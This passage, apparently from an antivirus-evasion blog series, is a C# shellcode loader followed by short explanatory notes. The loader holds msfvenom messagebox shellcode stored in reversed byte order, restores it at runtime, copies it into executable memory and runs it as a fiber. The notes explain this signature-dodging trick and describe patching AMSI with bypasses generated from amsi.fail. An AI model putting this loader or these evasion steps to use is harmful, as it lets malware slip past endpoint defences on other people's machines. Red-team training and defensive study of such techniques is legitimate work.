			// msfvenom -p windows/x64/messagebox -f csharp -e x64/xor_dynamic, with the bytes stored in reverse order
			byte[] waffle = new byte[] { 
				0x3b, 0xc8, 0x10, 0x68, 0x7f, 0x52, 0x75, 0x77, 0x71, 0x63, 0x63, 0x75, 0x5d, 0x10, 0x31, 0x56, 0x43, 0x5d, 0x30, 0x7d, 0x7f, 0x62, 0x76, 0x30, 0x3c, 0x7f, 0x7c, 0x7c, 0x75, 0x58, 0xc5, 0xef, 0x46, 0xb2, 0xa5, 0xe0, 0xaa, 0x51, 0xd9, 0x21, 0x58, 0xc5, 0xef, 0x17, 0x46, 0x93, 0x55, 0xaa, 0x51, 0xd9, 0x21, 0x58, 0x10, 0x10, 0x11, 0x1f, 0x95, 0x9d, 0x5c, 0x2e, 0x10, 0x10, 0x10, 0xee, 0x85, 0x9d, 0x58, 0x2e, 0x10, 0x10, 0x10, 0x10, 0xd1, 0xd7, 0x59, 0x4d, 0xef, 0xef, 0xef, 0x59, 0xf9, 0x02, 0x9b, 0x58, 0x2e, 0x4a, 0x49, 0x51, 0x48, 0xf0, 0xef, 0x42, 0x51, 0x30, 0xfc, 0x93, 0x58, 0x4a, 0x51, 0x49, 0x51, 0x48, 0x51, 0x4a, 0x49, 0x4e, 0x48, 0x51, 0x48, 0x51, 0xc0, 0x11, 0x58, 0x98, 0x14, 0x9b, 0x51, 0x2e, 0xc0, 0x11, 0x59, 0x0c, 0x50, 0x9b, 0x54, 0x2e, 0x58, 0x1c, 0x9b, 0x51, 0x2e, 0x76, 0xc0, 0x11, 0x59, 0x34, 0x50, 0x9b, 0x54, 0x2e, 0x48, 0xc6, 0x65, 0xc1, 0x29, 0x55, 0x18, 0x34, 0x5c, 0x13, 0x5c, 0x2e, 0xe1, 0x65, 0xf0, 0x28, 0xd1, 0x11, 0x51, 0x1d, 0xd9, 0xd1, 0x51, 0xbc, 0xd0, 0x21, 0x58, 0xd9, 0x21, 0x5d, 0xc6, 0x11, 0x58, 0x98, 0x24, 0x9b, 0x51, 0x2e, 0xd9, 0xef, 0x58, 0x4c, 0xf3, 0xc0, 0x11, 0x59, 0x30, 0x50, 0x9b, 0x54, 0x2e, 0x08, 0x58, 0x9b, 0x2e, 0x40, 0xc0, 0x11, 0x58, 0x7f, 0x64, 0xd0, 0x95, 0x58, 0x10, 0x10, 0x10, 0x98, 0x90, 0x9b, 0x2e, 0xc0, 0x11, 0x58, 0x2c, 0x52, 0x9b, 0x2e, 0x30, 0x42, 0x9b, 0x58, 0x2e, 0x41, 0x51, 0x42, 0xfd, 0xf2, 0xd1, 0x11, 0x51, 0x1d, 0xd9, 0xd1, 0x51, 0x30, 0x3c, 0x12, 0x6c, 0x71, 0x2c, 0xbc, 0xd0, 0x21, 0x58, 0xd9, 0x21, 0x5d, 0x5a, 0x5a, 0xa7, 0x1f, 0x58, 0x2e, 0x40, 0x62, 0x9b, 0x58, 0x2e, 0x30, 0x42, 0x9b, 0x58, 0x2e, 0x08, 0x42, 0x9b, 0x58, 0x2e, 0x70, 0x42, 0x9b, 0x58, 0x75, 0xc2, 0x21, 0x58, 0x46, 0x41, 0x42, 0x40, 0x51, 0x41, 0x51, 0x10, 0x10, 0x10, 0xc0, 0xf8, 0xef, 0xef, 0xef, 0xe0, 0xf4, 0x91, 0x58, 0xec, 0x3b, 0x10, 0xff, 0xff, 0xff, 0xd4, 0xe8, 0xe1, 0xff, 0xe6, 0xeb, 0xea, 0x75, 0x3b, 0x3e, 0x80, 0x07, 0x74, 0x3b, 0xc8, 0x3f, 0x81, 0x66, 0xc6, 0xff, 0x48, 0xc7, 0xff, 0x48, 0x07, 0x30, 0x06, 0x8a, 0x5e, 0x53, 
0x59, 0x57, 0xfd, 0x75, 0xae, 0xfc, 0x3b, 0xb0, 0x5f, 0x53, 0x5b, 0x27, 0xeb
			};

			Array.Reverse(waffle);

			int size = waffle.Length;
			// The calling thread must itself be a fiber before it can create or switch to other fibers.
			var MasterFiber = ConvertThreadToFiber(IntPtr.Zero);
			IntPtr addr = VirtualAlloc(IntPtr.Zero, 0x1000, 0x3000, 0x40);
			Marshal.Copy(waffle, 0, addr, size);
			// Fiber entry point = shellcode buffer; SwitchToFiber runs it on this same thread, no CreateThread involved.
			IntPtr hFiber = CreateFiber(0, addr, IntPtr.Zero);
			SwitchToFiber(hFiber);
		}
	}
}

Build it and upload the executable to VirusTotal:

Note on the "double reverse" technique: we obfuscate the payload by reversing the shellcode bytes offline and calling Array.Reverse() at runtime to restore them, so the signatured byte sequence never sits in the binary.

Note on AMSI: at a high level, once PowerShell starts, amsi.dll is loaded into the process and AmsiScanBuffer is called on each script block before it runs. Because the DLL lives in the same process as the script, the script can patch it. Matt Graeber published the original PowerShell AMSI bypass, a reflection one-liner that makes PowerShell's scanning path treat everything as clean. Microsoft "fixed" this by adding the bypass itself as a known malicious signature, but signature detection is brittle and is bypassed fairly easily. The site amsi.fail was set up to generate AMSI bypasses; we pull one down and keep trying payloads in PowerShell until one runs as intended.

Reference

  • AV Evasion Part 1 · Hop Infosec
  • AV Evasion Part 2, The disk is lava · Hop Infosec
  • AV Evasion Part 3: Fibers · Hop Infosec
  • amsi.fail
  • VirusTotal
  • Microsoft Docs, Antimalware Scan Interface: https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal
  • Microsoft Docs, Fibers: https://docs.microsoft.com/en-us/windows/win32/procthread/fibers